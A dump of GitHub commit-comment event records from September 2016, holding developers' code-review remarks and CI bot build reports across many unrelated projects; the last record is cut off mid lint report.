{"id":"4596695252","type":"CommitCommentEvent","actor":{"login":"MigFerreira"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19114851,"position":12,"line":216,"path":"src/NodeGraphicsObject.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-21T14:41:08Z","updated_at":"2016-09-21T14:41:08Z","body":"My idea is that it might be interesting for a node have multiple properties that are not located on the node itself but in a properties area (on a right panel for example).\nSo main properties could be on the node, and additional secondary properties would be in the panel.\nThe properties panel would be updated upon selection.\n\nMaybe I'm getting ahead of myself thinking about features you have no intent on being added.\nOn 21/09/2016 09:49:35, paceholder <notifications@github.com> wrote:\nMaybe I do not see your point. Why would you need a newly created node to be selected?\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub [https://github.com/MigFerreira/nodeeditor/commit/9ebda26996a5a9a0b98f7b20abc06b58706df80b#commitcomment-19110230], or mute the thread [https://github.com/notifications/unsubscribe-auth/AAdn-Ou4Q2UpJs9sdUVBtKmshrcVMAMbks5qsO-dgaJpZM4KBzmP]."}},"created_at":"2016-09-21T14:41:08Z"}
{"id":"4596695311","type":"CommitCommentEvent","actor":{"login":"nanorarias"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114852,"position":59,"line":59,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:41:09Z","updated_at":"2016-09-21T14:41:09Z","body":"En la línea que te comenté, en un lugar estás haciendo `program.name`. Al hacer eso estás accediendo directamente a una propiedad de `Program` (`name`) desde la clase `Controller`. A eso me refería."}},"created_at":"2016-09-21T14:41:09Z"}
{"id":"4596701680","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"jasonwynn10/MyPlot"},"payload":{"comment":{"id":19114864,"position":null,"line":null,"path":null,"commit_id":"db05248fe03f3ad74436aa8158c020af3a381f61","created_at":"2016-09-21T14:42:09Z","updated_at":"2016-09-21T14:42:09Z","body":"what did this do exactly?"}},"created_at":"2016-09-21T14:42:09Z"}
{"id":"4596706455","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19114880,"position":null,"line":null,"path":null,"commit_id":"a2b70865948a7c1bc5e1a2a69797aa865c96d45e","created_at":"2016-09-21T14:42:49Z","updated_at":"2016-09-21T14:42:49Z","body":"It should work by cluster.  I'm going to debug this whole thing sometime and see what else this driver is doing.  At least I'll see what values OnePlus is putting in there."}},"created_at":"2016-09-21T14:42:49Z"}
{"id":"4596709201","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19114884,"position":6,"line":3338,"path":"src/server/game/Maps/Map.cpp","commit_id":"820e8433917fe27c4a1093482532c6986b519e1f","created_at":"2016-09-21T14:43:14Z","updated_at":"2016-09-21T14:43:14Z","body":"TC_LOG_ERROR is a preprocessor macro. I'm a bit cautious with those."}},"created_at":"2016-09-21T14:43:14Z"}
{"id":"4596709270","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19114885,"position":11,"line":92,"path":"templates/partials/contacts_content.html","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-21T14:43:14Z","updated_at":"2016-09-21T14:43:14Z","body":"Yeah, that's advance optimization : the icon is supposed to be different as well, I just didn't get to it yet. So it'll make more sense later.\r\n"}},"created_at":"2016-09-21T14:43:14Z"}
{"id":"4596710713","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19114886,"position":14,"line":111,"path":"scripts/test-upgrade.sh","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T14:43:28Z","updated_at":"2016-09-21T14:43:28Z","body":"I don't quite understand why ``lxc-containers-create.yml`` is invoked here. What am I missing?"}},"created_at":"2016-09-21T14:43:28Z"}
{"id":"4596711245","type":"CommitCommentEvent","actor":{"login":"idvkreutzer"},"repo":{"name":"tsidv/kpi"},"payload":{"comment":{"id":19114887,"position":null,"line":null,"path":null,"commit_id":"ba9561bf4ccaf90768abf99bc5b65dc0208744ed","created_at":"2016-09-21T14:43:32Z","updated_at":"2016-09-21T14:43:32Z","body":"also tested satellite pvt health evaluation with float tests"}},"created_at":"2016-09-21T14:43:32Z"}
{"id":"4596713238","type":"CommitCommentEvent","actor":{"login":"Chinipage"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114891,"position":59,"line":59,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:43:49Z","updated_at":"2016-09-21T14:43:49Z","body":"Aaa si, eso lo hice de pajero, pensaba corregirlo, pero tenia que ponerme\ncon proba. Habria que cambiar el atributo a privado de nuevo y crear el\ngetter. En eso tenes razon, no esta bueno ir directo al atributo.\n\nEl 21 de septiembre de 2016, 11:41, 親日［しんニチ］ <notifications@github.com>\nescribió:\n\n> En la línea que te comenté, en un lugar estás haciendo program.name. Al\n> hacer eso estás accediendo directamente a una propiedad de Program (name)\n> desde la clase Controller. A eso me refería.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Chinipage/tp-algoritmosComplejos/commit/6b28854dc1804e9d07b6eec42e8b91436eef0b00#commitcomment-19114852>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIM_E1KjUtWLWUL62CLDXT-y7YQv-8Mhks5qsUIFgaJpZM4KC11->\n> .\n>\n"}},"created_at":"2016-09-21T14:43:49Z"}
{"id":"4596715221","type":"CommitCommentEvent","actor":{"login":"taisel"},"repo":{"name":"mgba-emu/mgba"},"payload":{"comment":{"id":19114894,"position":null,"line":null,"path":null,"commit_id":"1cb054ec67ea7b1e7e9162c1e74bd4ab254efb74","created_at":"2016-09-21T14:44:08Z","updated_at":"2016-09-21T14:44:08Z","body":"Yeah LY=LYC is level sensitive, and asserts always. "}},"created_at":"2016-09-21T14:44:08Z"}
{"id":"4596715737","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19114896,"position":12,"line":109,"path":"scripts/test-upgrade.sh","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T14:44:12Z","updated_at":"2016-09-21T14:44:12Z","body":"```\r\nexport DEPLOY_CEPH=${DEPLOY_CEPH:-\"no\"}\r\nif [[ ${DEPLOY_CEPH} ]]; then\r\n..\r\n```"}},"created_at":"2016-09-21T14:44:12Z"}
{"id":"4596718570","type":"CommitCommentEvent","actor":{"login":"sanmiguel"},"repo":{"name":"byaruhaf/vim-erlang-skeletons"},"payload":{"comment":{"id":19114902,"position":4,"line":10,"path":"plugin/templates/eunit","commit_id":"b9f5455f15dee96731fce5573f31bf7054670eb0","created_at":"2016-09-21T14:44:36Z","updated_at":"2016-09-21T14:44:36Z","body":"I think we do actually have an `$author` tag that defaults to `$USER` or can be set via a config item. It'd be nice to use that here if we can!"}},"created_at":"2016-09-21T14:44:36Z"}
{"id":"4596720266","type":"CommitCommentEvent","actor":{"login":"MZorzy"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19114904,"position":200,"line":1137,"path":"js/main.js","commit_id":"34fbf98776b9c056e0428ee0f054b43963d2be62","created_at":"2016-09-21T14:44:51Z","updated_at":"2016-09-21T14:44:51Z","body":"SyntaxError: expected expression, got '*' main.js:1137:44"}},"created_at":"2016-09-21T14:44:51Z"}
{"id":"4596722102","type":"CommitCommentEvent","actor":{"login":"golfromeo-fr"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19114912,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T14:45:08Z","updated_at":"2016-09-21T14:45:08Z","body":"@zador-blood-stained \r\nThanks for the clarification, so the policy is \"provide images for the wider (possible) audience/usage\"\r\nI like that."}},"created_at":"2016-09-21T14:45:08Z"}
{"id":"4596723968","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":19114917,"position":null,"line":null,"path":null,"commit_id":"787cb81986e2356686be92d0acea90e11ccfeec7","created_at":"2016-09-21T14:45:23Z","updated_at":"2016-09-21T14:45:23Z","body":"Um, this branch isn't finished. There are many things wrong. I'm planning to update with the latest css from doxygen and then customize it. I also want to improve the front page a bit."}},"created_at":"2016-09-21T14:45:23Z"}
{"id":"4596724066","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19114918,"position":100,"line":229,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T14:45:24Z","updated_at":"2016-09-21T14:45:24Z","body":"@asridharan inet_pton() is a function for converting a string to a specific format mandated by POSIX, it should never enter kernel-space and not depend on the site network configuration. Of course, the compilation will fail if someones tries to compile against his custom version of glibc or another libc without `inet_pton()`, but this was already the case before. On a hypothetical system where `netinet/in.h` is missing a define for `AF_INET6`, it shouldn't have been possible to compile `inet_pton()` in the first place."}},"created_at":"2016-09-21T14:45:24Z"}
{"id":"4596726581","type":"CommitCommentEvent","actor":{"login":"ChesterChin92"},"repo":{"name":"ChesterChin92/case-project"},"payload":{"comment":{"id":19114925,"position":5,"line":11,"path":"index.php","commit_id":"4932c8ed9d22d776a5d3f459b0d173b6b18cc564","created_at":"2016-09-21T14:45:46Z","updated_at":"2016-09-21T14:45:46Z","body":"Can add comment inline as well."}},"created_at":"2016-09-21T14:45:46Z"}
{"id":"4596729126","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19114929,"position":null,"line":null,"path":null,"commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T14:46:08Z","updated_at":"2016-09-21T14:46:08Z","body":"Testing this now"}},"created_at":"2016-09-21T14:46:08Z"}
{"id":"4596741466","type":"CommitCommentEvent","actor":{"login":"ashoksoni"},"repo":{"name":"AICP/packages_apps_PackageInstaller"},"payload":{"comment":{"id":19114955,"position":null,"line":null,"path":null,"commit_id":"5fea0088a96d6b98d9cfcc4ae78fc2d53857df16","created_at":"2016-09-21T14:47:56Z","updated_at":"2016-09-21T14:47:56Z","body":"Hi, \r\n\r\nI cherry picked this commit for my unofficial rr rom but it didn't show anything. Do I need to set up anything else  too? "}},"created_at":"2016-09-21T14:47:56Z"}
{"id":"4596742345","type":"CommitCommentEvent","actor":{"login":"sdssix"},"repo":{"name":"sdssix/address-bloc"},"payload":{"comment":{"id":19114957,"position":null,"line":null,"path":null,"commit_id":"bfdeca5469dd23a2782af233c90c05d3d6c8587b","created_at":"2016-09-21T14:48:04Z","updated_at":"2016-09-21T14:48:04Z","body":"Interesting, let me try that\n\n-David\n\n\n\n\n\nOn Tue, Sep 20, 2016 at 3:52 PM, Mark Carpenter <notifications@github.com>\nwrote:\n\n> @sdssix <https://github.com/sdssix> I don't 'see' where the missing end\n> is. Use this technique to find it. Comment out 1/2 the code and rerun it.\n> If the error is gone, you now what half contains it. Slice the offending\n> half in half, and repeat. Keep slicing things in half and you'll quickly\n> find it.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sdssix/address-bloc/commit/bfdeca5469dd23a2782af233c90c05d3d6c8587b#commitcomment-19102919>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACa1-E-3xJjCpdjvZukvpjeXjq_O6-4Kks5qsDlogaJpZM4KCESZ>\n> .\n>\n"}},"created_at":"2016-09-21T14:48:04Z"}
{"id":"4596742558","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19114959,"position":35,"line":647,"path":"man/vsearch.1","commit_id":"abb5ab42a19cf0eb4084ad4612db8619e20af0ed","created_at":"2016-09-21T14:48:07Z","updated_at":"2016-09-21T14:48:07Z","body":"Sorry for that one, but fixed now in the latest commit (not released yet). It was previously fixed in UC output from the other commands (search, allpairs etc) but not for clustering. Refactored code as well."}},"created_at":"2016-09-21T14:48:07Z"}
{"id":"4596744654","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19114966,"position":null,"line":null,"path":null,"commit_id":"f3f061fa28648750c656b81e04f856b559420317","created_at":"2016-09-21T14:48:25Z","updated_at":"2016-09-21T14:48:25Z","body":"👍 thank you @ledell !"}},"created_at":"2016-09-21T14:48:25Z"}
{"id":"4596750137","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19114978,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-21T14:49:13Z","updated_at":"2016-09-21T14:49:13Z","body":"You should use `aggregate.mean(os.cpu.all.active_percentage) {active}` instead. Alias goes will be applied to the left expression."}},"created_at":"2016-09-21T14:49:13Z"}
{"id":"4596754877","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19114990,"position":6,"line":3338,"path":"src/server/game/Maps/Map.cpp","commit_id":"820e8433917fe27c4a1093482532c6986b519e1f","created_at":"2016-09-21T14:49:55Z","updated_at":"2016-09-21T14:49:55Z","body":"It's fine, TC_LOG* macros are very smart and they're expanded to a `do { /* some code here*/ } while (0)` which does not \"leak\" indentations :P"}},"created_at":"2016-09-21T14:49:55Z"}
{"id":"4596756334","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19114993,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T14:50:08Z","updated_at":"2016-09-21T14:50:08Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2336 of 2339 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T14:50:08Z"}
{"id":"4596757038","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19114994,"position":null,"line":null,"path":null,"commit_id":"29c74411bd3fac374300cefca98ada97959000e3","created_at":"2016-09-21T14:50:13Z","updated_at":"2016-09-21T14:50:13Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 183](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1214&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-21T14:50:13Z"}
{"id":"4596760021","type":"CommitCommentEvent","actor":{"login":"americojosejr"},"repo":{"name":"americojosejr/livrogithub"},"payload":{"comment":{"id":19115005,"position":null,"line":null,"path":null,"commit_id":"297d2bd57586ac7bf5772f7f76566402b2d23ff7","created_at":"2016-09-21T14:50:40Z","updated_at":"2016-09-21T14:50:40Z","body":"este projeto visa informar de forma clara como e a alto ..."}},"created_at":"2016-09-21T14:50:40Z"}
{"id":"4596762912","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19115009,"position":null,"line":null,"path":null,"commit_id":"29c74411bd3fac374300cefca98ada97959000e3","created_at":"2016-09-21T14:51:05Z","updated_at":"2016-09-21T14:51:05Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 183](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1214&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:53"}},"created_at":"2016-09-21T14:51:05Z"}
{"id":"4596764602","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19115011,"position":6,"line":3338,"path":"src/server/game/Maps/Map.cpp","commit_id":"820e8433917fe27c4a1093482532c6986b519e1f","created_at":"2016-09-21T14:51:19Z","updated_at":"2016-09-21T14:51:19Z","body":"I'm not going to rely on that (the fact that those things are preprocessor macros are a scourge upon humanity anyway)."}},"created_at":"2016-09-21T14:51:19Z"}
{"id":"4596765092","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19115013,"position":5,"line":510,"path":"translations/messages-en.properties","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-21T14:51:23Z","updated_at":"2016-09-21T14:51:23Z","body":"Mockups seem to err on the side of More Capitals (Primary Contact, Head of Household, Allison Jones' Family, John Luck's Area, ... ) so I'm going to follow the convention. Do you care enough to file a medic-design issue about titlecase?\r\n\r\n(another solution is to use French. There's no such thing as titlecase in French. Problem solved.)"}},"created_at":"2016-09-21T14:51:23Z"}
{"id":"4596767143","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115017,"position":null,"line":null,"path":null,"commit_id":"22f37c7fc63ecd21c4d834b1f44882990b9683b6","created_at":"2016-09-21T14:51:40Z","updated_at":"2016-09-21T14:51:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1082](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13782&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 248, ignored: 3 Build time: 00:10:48"}},"created_at":"2016-09-21T14:51:40Z"}
{"id":"4596769031","type":"CommitCommentEvent","actor":{"login":"cassella"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19115022,"position":null,"line":null,"path":null,"commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-21T14:51:56Z","updated_at":"2016-09-21T14:51:56Z","body":"> `  return atomic_load(chpl_privateObjects)[i];`\r\n\r\nEven apart from performance, I think that's buggy.  It'll boil\r\ndown to something like\r\n\r\n```\r\nptr = atomic_load(chpl_privateObjects);\r\ntmp = ptr[i];\r\nreturn tmp;\r\n```\r\nBut between the atomic_load and the load of ptr[i], the resize\r\ncode can execute its atomic_store() and free()."}},"created_at":"2016-09-21T14:51:56Z"}
{"id":"4596769235","type":"CommitCommentEvent","actor":{"login":"FuckYouFrank"},"repo":{"name":"FrankVanDerVelde/ExamenOefening"},"payload":{"comment":{"id":19115023,"position":null,"line":null,"path":null,"commit_id":"685209b7be35ddbb9f344ac58d9eb7bc201484e1","created_at":"2016-09-21T14:51:58Z","updated_at":"2016-09-21T14:51:58Z","body":"Ik heb helemaal geen fouten, waar heb je het over"}},"created_at":"2016-09-21T14:51:58Z"}
{"id":"4596770995","type":"CommitCommentEvent","actor":{"login":"FuckYouFrank"},"repo":{"name":"FrankVanDerVelde/ExamenOefening"},"payload":{"comment":{"id":19115025,"position":null,"line":null,"path":null,"commit_id":"685209b7be35ddbb9f344ac58d9eb7bc201484e1","created_at":"2016-09-21T14:52:13Z","updated_at":"2016-09-21T14:52:13Z","body":"Ik wil meer als 2 fouten in vullen"}},"created_at":"2016-09-21T14:52:13Z"}
{"id":"4596771094","type":"CommitCommentEvent","actor":{"login":"JosielFaleiros"},"repo":{"name":"macieljp/veiculo"},"payload":{"comment":{"id":19115026,"position":null,"line":null,"path":null,"commit_id":"04a4f7bb014b819b448805f7810663ad116ba88b","created_at":"2016-09-21T14:52:14Z","updated_at":"2016-09-21T14:52:14Z","body":"sucesso"}},"created_at":"2016-09-21T14:52:14Z"}
{"id":"4596773783","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19115032,"position":12,"line":216,"path":"src/NodeGraphicsObject.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-21T14:52:38Z","updated_at":"2016-09-21T14:52:38Z","body":"I see now, it makes sense. We can emit a signal ```nodeSelected(NodeProperties)``` and each subscriber (i.e. a property panel) gets the property list."}},"created_at":"2016-09-21T14:52:38Z"}
{"id":"4596780418","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19115048,"position":null,"line":null,"path":null,"commit_id":"58d8c8c8a3c93e32427ed833c6b38934b6fcf1f1","created_at":"2016-09-21T14:53:36Z","updated_at":"2016-09-21T14:53:36Z","body":"I'm working on it; real life is interfering but the fix is simple enough."}},"created_at":"2016-09-21T14:53:36Z"}
{"id":"4596781455","type":"CommitCommentEvent","actor":{"login":"shixiaoda"},"repo":{"name":"shixiaoda/XMNPhotoPickerFramework"},"payload":{"comment":{"id":19115052,"position":null,"line":null,"path":null,"commit_id":"e0bb1f98b0f81d5c2f1545919c3bf4660368f993","created_at":"2016-09-21T14:53:44Z","updated_at":"2016-09-21T14:53:44Z","body":"fix bug"}},"created_at":"2016-09-21T14:53:44Z"}
{"id":"4596782996","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19115054,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-21T14:53:58Z","updated_at":"2016-09-21T14:53:58Z","body":"Let's say that I applied this generic enumeration everywhere. How do I revert `PlayerChatEvent`?\r\n\r\nPerhaps we have events where more than two results are possible. In fact, I was considering adding a third result status but decided against it because of the fact that it was a fairly complex usage."}},"created_at":"2016-09-21T14:53:58Z"}
{"id":"4596783636","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19115056,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-21T14:54:03Z","updated_at":"2016-09-21T14:54:03Z","body":"I did: no issues any more., neither with the original version of skin.py (from before any updates in this respect were introduced).\r\nPlugin has been fixed."}},"created_at":"2016-09-21T14:54:03Z"}
{"id":"4596786564","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19115062,"position":86,"line":625,"path":"raw_binary/format_conversion_libs/espa_geoloc.c","commit_id":"1e42a388105e5ceadce0f09fd1cd737ba3dd56e0","created_at":"2016-09-21T14:54:27Z","updated_at":"2016-09-21T14:54:27Z","body":"I ran with these changes on a bunch of scenes yesterday, and I didn't have any problems.  However, it looks to me like these checks would set the meridian_crossing flag for both antimeridian and Prime Meridian crossing scenes.  Is that intended?"}},"created_at":"2016-09-21T14:54:27Z"}
{"id":"4596787708","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19115064,"position":27,"line":85,"path":"src/modules/demos.js","commit_id":"f78586d209bb4d7256ff23b0ae158435b5662ea6","created_at":"2016-09-21T14:54:37Z","updated_at":"2016-09-21T14:54:37Z","body":"What does this line do? Do you have an example of the output?\r\n(just curious, I understand what JWT is but not familiar with this lib)"}},"created_at":"2016-09-21T14:54:37Z"}
{"id":"4596789006","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19115069,"position":12,"line":12,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T14:54:49Z","updated_at":"2016-09-21T14:54:49Z","body":"again former doc was like this"}},"created_at":"2016-09-21T14:54:49Z"}
{"id":"4596789633","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115071,"position":null,"line":null,"path":null,"commit_id":"c6925857282ce1688b77c5b8550ba98a827cabc3","created_at":"2016-09-21T14:54:55Z","updated_at":"2016-09-21T14:54:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1083](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13786&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T14:54:55Z"}
{"id":"4596797783","type":"CommitCommentEvent","actor":{"login":"alksdjflskjdl"},"repo":{"name":"alksdjflskjdl/test"},"payload":{"comment":{"id":19115085,"position":null,"line":null,"path":null,"commit_id":"1b11d719fa57ebaba63ebf5d2eba4a0755540dc0","created_at":"2016-09-21T14:56:07Z","updated_at":"2016-09-21T14:56:07Z","body":"\r\n[trippleSum.cpp.zip](https://github.com/alksdjflskjdl/test/files/485331/trippleSum.cpp.zip)\r\n"}},"created_at":"2016-09-21T14:56:07Z"}
{"id":"4596798740","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19115089,"position":95,"line":95,"path":"lesson_4/railways_core.rb","commit_id":"02eb7248ac0c4701eb48e1bb18ca1a1d782de490","created_at":"2016-09-21T14:56:15Z","updated_at":"2016-09-21T14:56:15Z","body":"Fixed"}},"created_at":"2016-09-21T14:56:15Z"}
{"id":"4596815118","type":"CommitCommentEvent","actor":{"login":"maksis"},"repo":{"name":"airdcpp/airgit"},"payload":{"comment":{"id":19115154,"position":null,"line":null,"path":null,"commit_id":"8e6eaefa00619c07d6bb40318f9f176c3f36e7ac","created_at":"2016-09-21T14:58:40Z","updated_at":"2016-09-21T14:58:40Z","body":"Hmm, I don't get such error. Source files for external libraries shouldn't contain custom modifications since there is no way to keep track of those."}},"created_at":"2016-09-21T14:58:40Z"}
{"id":"4596815741","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19115156,"position":27,"line":85,"path":"src/modules/demos.js","commit_id":"f78586d209bb4d7256ff23b0ae158435b5662ea6","created_at":"2016-09-21T14:58:45Z","updated_at":"2016-09-21T14:58:45Z","body":"the JWT token we get contains additional information set on the backend. jwt_decode decodes this JWT token.\r\n\r\nTake the demoSession.token and posts it at https://jwt.io/, you'll see the \"encoded\" content."}},"created_at":"2016-09-21T14:58:45Z"}
{"id":"4596820016","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19115161,"position":null,"line":null,"path":null,"commit_id":"cf3877f957829f6888f3371b20fb8cd1a752e9eb","created_at":"2016-09-21T14:59:22Z","updated_at":"2016-09-21T14:59:22Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          